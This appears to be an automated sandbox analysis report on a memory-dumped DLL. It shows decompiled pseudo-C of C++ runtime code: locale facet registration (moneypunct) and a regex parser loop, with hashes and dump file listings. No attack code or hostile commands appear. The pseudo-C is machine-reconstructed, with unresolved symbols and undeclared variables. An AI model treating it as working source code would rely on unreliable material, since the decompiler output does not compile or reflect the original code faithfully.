Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E19932A
std::_Facet_Register.LIBCPMT ref: 6E199341
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199361
Concurrency::cancel_current_task.LIBCPMT ref: 6E19936E

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 6c3608e2ec77338507a0f8c2201b0592bd4a3d29abd5ff76c5aa4df6c83a0592
Instruction ID: d788cbee4a1e63204e9d811192541543f6225f3b3f0145b497824c6980705d36
Opcode Fuzzy Hash: 6c3608e2ec77338507a0f8c2201b0592bd4a3d29abd5ff76c5aa4df6c83a0592
Instruction Fuzzy Hash: E301C4359001199FCF05DBE8C8246FE77B9AF94714F244809E815AB2C0CF719AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199374, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E199374(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t134;
				void* _t238;
				signed int _t347;
				void* _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				void* _t412;

				_t287 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t412 - 0x14, 0);
				_t391 =  *0x6e221700; // 0x0
				 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
				 *(_t412 - 0x10) = _t391;
				_t134 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(__ebx, 0x6e2216b4, __edi, _t391));
				_t380 = _t134;
				if(_t134 != 0) {
					L5:
					E6E18F30C(_t412 - 0x14);
					return E6E1A9D88(_t380);
				} else {
					if(_t391 == 0) {
						_push( *((intOrPtr*)(_t412 + 8)));
						_push(_t412 - 0x10);
						__eflags = E6E19AE7C(__ebx, _t380, _t391) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t287, _t380, _t391, 8);
							E6E18F2A5(_t412 - 0x14, 0);
							_t392 =  *0x6e2216fc; // 0x0
							 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
							 *(_t412 - 0x10) = _t392;
							_t381 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216b0, _t380, _t392));
							__eflags = _t381;
							if(_t381 != 0) {
								L12:
								E6E18F30C(_t412 - 0x14);
								return E6E1A9D88(_t381);
							} else {
								__eflags = _t392;
								if(_t392 == 0) {
									_push( *((intOrPtr*)(_t412 + 8)));
									_push(_t412 - 0x10);
									__eflags = E6E19AF00(_t287, _t381, _t392) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t287, _t381, _t392, 8);
										E6E18F2A5(_t412 - 0x14, 0);
										_t393 =  *0x6e221710; // 0x0
										 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
										 *(_t412 - 0x10) = _t393;
										_t382 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216bc, _t381, _t393));
										__eflags = _t382;
										if(_t382 != 0) {
											L19:
											E6E18F30C(_t412 - 0x14);
											return E6E1A9D88(_t382);
										} else {
											__eflags = _t393;
											if(_t393 == 0) {
												_push( *((intOrPtr*)(_t412 + 8)));
												_push(_t412 - 0x10);
												__eflags = E6E19AF85(_t287, _t382, _t393) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t287, _t382, _t393, 8);
													E6E18F2A5(_t412 - 0x14, 0);
													_t394 =  *0x6e2216e8; // 0x0
													 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
													 *(_t412 - 0x10) = _t394;
													_t383 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e22169c, _t382, _t394));
													__eflags = _t383;
													if(_t383 != 0) {
														L26:
														E6E18F30C(_t412 - 0x14);
														return E6E1A9D88(_t383);
													} else {
														__eflags = _t394;
														if(_t394 == 0) {
															_push( *((intOrPtr*)(_t412 + 8)));
															_push(_t412 - 0x10);
															__eflags = E6E19AFED(_t287, _t383, _t394) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t287, _t383, _t394, 8);
																E6E18F2A5(_t412 - 0x14, 0);
																_t395 =  *0x6e221714; // 0x0
																 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
																 *(_t412 - 0x10) = _t395;
																_t384 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216c0, _t383, _t395));
																__eflags = _t384;
																if(_t384 != 0) {
																	L33:
																	E6E18F30C(_t412 - 0x14);
																	return E6E1A9D88(_t384);
																} else {
																	__eflags = _t395;
																	if(_t395 == 0) {
																		_push( *((intOrPtr*)(_t412 + 8)));
																		_push(_t412 - 0x10);
																		__eflags = E6E19B055(_t287, _t384, _t395) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t287, _t384, _t395, 8);
																			E6E18F2A5(_t412 - 0x14, 0);
																			_t396 =  *0x6e221718; // 0x0
																			 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
																			 *(_t412 - 0x10) = _t396;
																			_t385 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216c4, _t384, _t396));
																			__eflags = _t385;
																			if(_t385 != 0) {
																				L40:
																				E6E18F30C(_t412 - 0x14);
																				return E6E1A9D88(_t385);
																			} else {
																				__eflags = _t396;
																				if(_t396 == 0) {
																					_push( *((intOrPtr*)(_t412 + 8)));
																					_push(_t412 - 0x10);
																					__eflags = E6E19B0BD(_t287, _t385, _t396) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t287, _t385, _t396, 8);
																						E6E18F2A5(_t412 - 0x14, 0);
																						_t397 =  *0x6e221734; // 0x0
																						 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
																						 *(_t412 - 0x10) = _t397;
																						_t386 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216e0, _t385, _t397));
																						__eflags = _t386;
																						if(_t386 != 0) {
																							L47:
																							E6E18F30C(_t412 - 0x14);
																							return E6E1A9D88(_t386);
																						} else {
																							__eflags = _t397;
																							if(_t397 == 0) {
																								_push( *((intOrPtr*)(_t412 + 8)));
																								_push(_t412 - 0x10);
																								__eflags = E6E19B138(_t287, _t386, _t397) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t287, _t386, _t397, 8);
																									E6E18F2A5(_t412 - 0x14, 0);
																									_t398 =  *0x6e221704; // 0x0
																									 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
																									 *(_t412 - 0x10) = _t398;
																									_t387 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216b8, _t386, _t398));
																									__eflags = _t387;
																									if(_t387 != 0) {
																										L54:
																										E6E18F30C(_t412 - 0x14);
																										return E6E1A9D88(_t387);
																									} else {
																										__eflags = _t398;
																										if(_t398 == 0) {
																											_push( *((intOrPtr*)(_t412 + 8)));
																											_push(_t412 - 0x10);
																											__eflags = E6E19B1A4(_t287, _t387, _t398) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t287, _t387, _t398, 8);
																												E6E18F2A5(_t412 - 0x14, 0);
																												_t399 =  *0x6e221738; // 0x0
																												 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
																												 *(_t412 - 0x10) = _t399;
																												_t388 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e2216e4, _t387, _t399));
																												__eflags = _t388;
																												if(_t388 != 0) {
																													L61:
																													E6E18F30C(_t412 - 0x14);
																													return E6E1A9D88(_t388);
																												} else {
																													__eflags = _t399;
																													if(_t399 == 0) {
																														_push( *((intOrPtr*)(_t412 + 8)));
																														_push(_t412 - 0x10);
																														__eflags = E6E19B210(_t287, _t388, _t399) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t287, _t388, _t399, 8);
																															E6E18F2A5(_t412 - 0x14, 0);
																															_t400 =  *0x6e221708; // 0x0
																															 *(_t412 - 4) =  *(_t412 - 4) & 0x00000000;
																															 *(_t412 - 0x10) = _t400;
																															_t389 = E6E162171( *((intOrPtr*)(_t412 + 8)), E6E161F29(_t287, 0x6e221698, _t388, _t400));
																															__eflags = _t389;
																															if(_t389 != 0) {
																																L68:
																																E6E18F30C(_t412 - 0x14);
																																return E6E1A9D88(_t389);
																															} else {
																																__eflags = _t400;
																																if(_t400 == 0) {
																																	_push( *((intOrPtr*)(_t412 + 8)));
																																	_push(_t412 - 0x10);
																																	_t238 = E6E19B284(_t287, _t389, _t400);
																																	_pop(_t347);
																																	__eflags = _t238 - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ecb1a, _t287, _t389, _t400, 4);
																																		_t401 = _t347;
																																		 *(_t412 - 0x10) = _t401;
																																		 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t412 + 0xc));
																																		_push( *((intOrPtr*)(_t412 + 0x14)));
																																		_t127 = _t412 - 4;
																																		 *_t127 =  *(_t412 - 4) & 0x00000000;
																																		__eflags =  *_t127;
																																		 *_t401 = 0x6e1f225c;
																																		 *((char*)(_t401 + 0x28)) =  *((intOrPtr*)(_t412 + 0x10));
																																		E6E19F3D8(_t287, _t347, _t378, _t389, _t401,  *_t127);
																																		return E6E1A9D88(_t401,  *((intOrPtr*)(_t412 + 8)));
																																	} else {
																																		_t389 =  *(_t412 - 0x10);
																																		 *(_t412 - 0x10) = _t389;
																																		 *(_t412 - 4) = 1;
																																		E6E1911C1(__eflags, _t389);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
																																		 *0x6e221708 = _t389;
																																		goto L68;
																																	}
																																} else {
																																	_t389 = _t400;
																																	goto L68;
																																}
																															}
																														} else {
																															_t388 =  *(_t412 - 0x10);
																															 *(_t412 - 0x10) = _t388;
																															 *(_t412 - 4) = 1;
																															E6E1911C1(__eflags, _t388);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t388 + 4))))();
																															 *0x6e221738 = _t388;
																															goto L61;
																														}
																													} else {
																														_t388 = _t399;
																														goto L61;
																													}
																												}
																											} else {
																												_t387 =  *(_t412 - 0x10);
																												 *(_t412 - 0x10) = _t387;
																												 *(_t412 - 4) = 1;
																												E6E1911C1(__eflags, _t387);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t387 + 4))))();
																												 *0x6e221704 = _t387;
																												goto L54;
																											}
																										} else {
																											_t387 = _t398;
																											goto L54;
																										}
																									}
																								} else {
																									_t386 =  *(_t412 - 0x10);
																									 *(_t412 - 0x10) = _t386;
																									 *(_t412 - 4) = 1;
																									E6E1911C1(__eflags, _t386);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t386 + 4))))();
																									 *0x6e221734 = _t386;
																									goto L47;
																								}
																							} else {
																								_t386 = _t397;
																								goto L47;
																							}
																						}
																					} else {
																						_t385 =  *(_t412 - 0x10);
																						 *(_t412 - 0x10) = _t385;
																						 *(_t412 - 4) = 1;
																						E6E1911C1(__eflags, _t385);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t385 + 4))))();
																						 *0x6e221718 = _t385;
																						goto L40;
																					}
																				} else {
																					_t385 = _t396;
																					goto L40;
																				}
																			}
																		} else {
																			_t384 =  *(_t412 - 0x10);
																			 *(_t412 - 0x10) = _t384;
																			 *(_t412 - 4) = 1;
																			E6E1911C1(__eflags, _t384);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t384 + 4))))();
																			 *0x6e221714 = _t384;
																			goto L33;
																		}
																	} else {
																		_t384 = _t395;
																		goto L33;
																	}
																}
															} else {
																_t383 =  *(_t412 - 0x10);
																 *(_t412 - 0x10) = _t383;
																 *(_t412 - 4) = 1;
																E6E1911C1(__eflags, _t383);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t383 + 4))))();
																 *0x6e2216e8 = _t383;
																goto L26;
															}
														} else {
															_t383 = _t394;
															goto L26;
														}
													}
												} else {
													_t382 =  *(_t412 - 0x10);
													 *(_t412 - 0x10) = _t382;
													 *(_t412 - 4) = 1;
													E6E1911C1(__eflags, _t382);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t382 + 4))))();
													 *0x6e221710 = _t382;
													goto L19;
												}
											} else {
												_t382 = _t393;
												goto L19;
											}
										}
									} else {
										_t381 =  *(_t412 - 0x10);
										 *(_t412 - 0x10) = _t381;
										 *(_t412 - 4) = 1;
										E6E1911C1(__eflags, _t381);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t381 + 4))))();
										 *0x6e2216fc = _t381;
										goto L12;
									}
								} else {
									_t381 = _t392;
									goto L12;
								}
							}
						} else {
							_t380 =  *(_t412 - 0x10);
							 *(_t412 - 0x10) = _t380;
							 *(_t412 - 4) = 1;
							E6E1911C1(__eflags, _t380);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t380 + 4))))();
							 *0x6e221700 = _t380;
							goto L5;
						}
					} else {
						_t380 = _t391;
						goto L5;
					}
				}
			}

0x6e199374
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993a5
0x6e1993aa
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2

APIs

__EH_prolog3.LIBCMT ref: 6E19937B
std::_Lockit::_Lockit.LIBCPMT ref: 6E199385

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E1993BF
std::_Facet_Register.LIBCPMT ref: 6E1993D6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1993F6
Concurrency::cancel_current_task.LIBCPMT ref: 6E199403

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: e9fe979866d34cc28546dd583a4ac564ffe356afa36d492bce134b9c5b4beaf5
Instruction ID: 9d285fafeaac1ba0abaa64e43ddfcc3a5e286b63f1931e2a9ed5d2d762bcf19d
Opcode Fuzzy Hash: e9fe979866d34cc28546dd583a4ac564ffe356afa36d492bce134b9c5b4beaf5
Instruction Fuzzy Hash: 8301C4359006158FCB05DBE8D8646FE7779BF84354F244909E811AB2C0CF309AC5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E18C1D9, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E18C1D9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t60;
				char _t61;
				void* _t62;
				intOrPtr _t66;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				void* _t88;
				intOrPtr* _t90;
				signed int _t95;
				void* _t110;
				intOrPtr* _t112;
				void* _t115;
				intOrPtr _t118;

				_t88 = __ecx;
				E6E1A9DBF(0x6e1ebce9, __ebx, __edi, __esi, 0x6c);
				_t110 = _t88;
				E6E18C465(_t115 - 0x78);
				 *(_t115 - 4) = 0;
				_t112 = _t110 + 0xa8;
				while(1) {
					 *((char*)(_t115 - 0x24)) = 0;
					_t90 = _t112;
					 *((intOrPtr*)(_t115 - 0x20)) = 1;
					 *((intOrPtr*)(_t115 - 0x1c)) = 0;
					 *((intOrPtr*)(_t115 - 0x18)) = 0;
					if(E6E189048(_t90, _t115 - 0x24) != 0) {
						break;
					}
					_t60 =  *((intOrPtr*)(_t110 + 0xac));
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags = _t60 - 1;
						if(_t60 != 1) {
							continue;
						} else {
							_t61 =  *_t112;
							__eflags = _t61 - 0x29;
							if(__eflags == 0) {
								break;
							} else {
								__eflags = _t61 - 0x7c;
								if(__eflags == 0) {
									break;
								} else {
									__eflags =  *((intOrPtr*)(_t115 - 0x70));
									if(__eflags > 0) {
										goto L35;
									} else {
										__eflags = _t61 - 0x28;
										if(__eflags == 0) {
											_push( *(_t115 + 8));
											_t62 = E6E18D254(0, _t110, _t110, _t112, __eflags);
											goto L43;
										} else {
											__eflags = _t61 - 0x5b;
											if(_t61 == 0x5b) {
												L40:
												_t62 = E6E18CD5C(0, _t110, _t110, _t112,  *(_t115 + 8));
												goto L43;
											} else {
												__eflags = _t61 - 0x2e;
												if(_t61 == 0x2e) {
													goto L40;
												} else {
													__eflags = _t61 - 0x77;
													if(_t61 == 0x77) {
														goto L40;
													} else {
														__eflags = _t61 - 0x57;
														if(_t61 == 0x57) {
															goto L40;
														} else {
															__eflags = _t61 - 0x73;
															if(_t61 == 0x73) {
																goto L40;
															} else {
																__eflags = _t61 - 0x53;
																if(_t61 == 0x53) {
																	goto L40;
																} else {
																	__eflags = _t61 - 0x64;
																	if(_t61 == 0x64) {
																		goto L40;
																	} else {
																		__eflags = _t61 - 0x44;
																		if(_t61 == 0x44) {
																			goto L40;
																		} else {
																			__eflags = _t61 - 0x5e;
																			if(_t61 == 0x5e) {
																				L39:
																				_push( *(_t115 + 8));
																				_t62 = E6E18DBBD(0, _t110, _t110, _t112);
																				goto L43;
																			} else {
																				__eflags = _t61 - 0x24;
																				if(_t61 == 0x24) {
																					goto L39;
																				} else {
																					__eflags = _t61 - 0x41;
																					if(_t61 == 0x41) {
																						goto L39;
																					} else {
																						__eflags = _t61 - 0x5a;
																						if(_t61 == 0x5a) {
																							goto L39;
																						} else {
																							__eflags = _t61 - 0x7a;
																							if(_t61 == 0x7a) {
																								goto L39;
																							} else {
																								__eflags = _t61 - 0x62;
																								if(_t61 == 0x62) {
																									goto L39;
																								} else {
																									__eflags = _t61 - 0x42;
																									if(_t61 == 0x42) {
																										goto L39;
																									} else {
																										__eflags = _t61 - 0x47;
																										if(_t61 == 0x47) {
																											goto L39;
																										} else {
																											__eflags = _t61 - 0x5c;
																											if(_t61 == 0x5c) {
																												L38:
																												_push( *(_t115 + 8));
																												_t62 = E6E18DD2A(0, _t110, _t110, _t112);
																												goto L43;
																											} else {
																												__eflags = _t61 - 0x6b;
																												if(_t61 == 0x6b) {
																													goto L38;
																												} else {
																													__eflags = _t61 - 0x67;
																													if(_t61 == 0x67) {
																														goto L38;
																													} else {
																														goto L31;
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						 *((char*)(_t115 - 0x34)) = 0x7b;
						_t90 = _t110 + 0xb8;
						 *((intOrPtr*)(_t115 - 0x30)) = 1;
						 *((intOrPtr*)(_t115 - 0x2c)) = 0;
						 *((intOrPtr*)(_t115 - 0x28)) = 0;
						_t75 = E6E189048(_t90, _t115 - 0x34);
						__eflags = _t75;
						if(_t75 != 0) {
							L36:
							__eflags =  *((intOrPtr*)(_t115 - 0x70));
							if(__eflags != 0) {
								L34:
								if(_t118 <= 0) {
									_push(0);
									_t62 = E6E189BAB(0, _t110, _t110, _t112);
									L43:
									_t113 = _t62;
								} else {
									L35:
									_t66 = E6E1A9621(0, _t110, _t112, _t118, 0x20);
									_t114 = _t66;
									 *((intOrPtr*)(_t115 - 0x14)) = _t66;
									 *(_t115 - 4) = 1;
									_t108 =  !=  ?  *((void*)(_t115 - 0x6c)) : 0x6e1fc3cb;
									_t95 =  *( *(_t115 + 8));
									_push(_t95 & 0x00000008);
									_push(_t95 & 0x00000010);
									_push( *((intOrPtr*)(_t115 - 0x70)));
									_push( !=  ?  *((void*)(_t115 - 0x6c)) : 0x6e1fc3cb);
									_t113 = E6E18E215(_t66, _t114,  *((intOrPtr*)(_t115 - 0x6c)));
									 *(_t115 - 4) = 0;
									E6E185E5E(_t110 + 0x14, _t69);
								}
								goto L44;
							} else {
								_push(_t90);
								 *((char*)(_t115 - 0x10)) =  *_t112;
								E6E18DEAB(_t115 - 0x78, _t115 - 0x10, 1);
								E6E187B3B(_t110);
								break;
							}
							L45:
						} else {
							 *((char*)(_t115 - 0x44)) = 0x3f;
							 *((intOrPtr*)(_t115 - 0x40)) = 1;
							 *((intOrPtr*)(_t115 - 0x3c)) = 0;
							 *((intOrPtr*)(_t115 - 0x38)) = 0;
							_t81 = E6E189048(_t90, _t115 - 0x44);
							__eflags = _t81;
							if(_t81 != 0) {
								goto L36;
							} else {
								 *((char*)(_t115 - 0x54)) = 0x2a;
								 *((intOrPtr*)(_t115 - 0x50)) = 1;
								 *((intOrPtr*)(_t115 - 0x4c)) = 0;
								 *((intOrPtr*)(_t115 - 0x48)) = 0;
								_t83 = E6E189048(_t90, _t115 - 0x54);
								__eflags = _t83;
								if(_t83 != 0) {
									goto L36;
								} else {
									 *((char*)(_t115 - 0x64)) = 0x2b;
									 *((intOrPtr*)(_t115 - 0x60)) = 1;
									 *((intOrPtr*)(_t115 - 0x5c)) = 0;
									 *((intOrPtr*)(_t115 - 0x58)) = 0;
									_t85 = E6E189048(_t90, _t115 - 0x64);
									__eflags = _t85;
									if(_t85 != 0) {
										goto L36;
									} else {
										_t61 =  *_t112;
										L31:
										_push(_t90);
										 *((char*)(_t115 - 0x10)) = _t61;
										E6E18DEAB(_t115 - 0x78, _t115 - 0x10, 1);
										E6E187B3B(_t110);
										continue;
									}
								}
							}
						}
					}
					L44:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
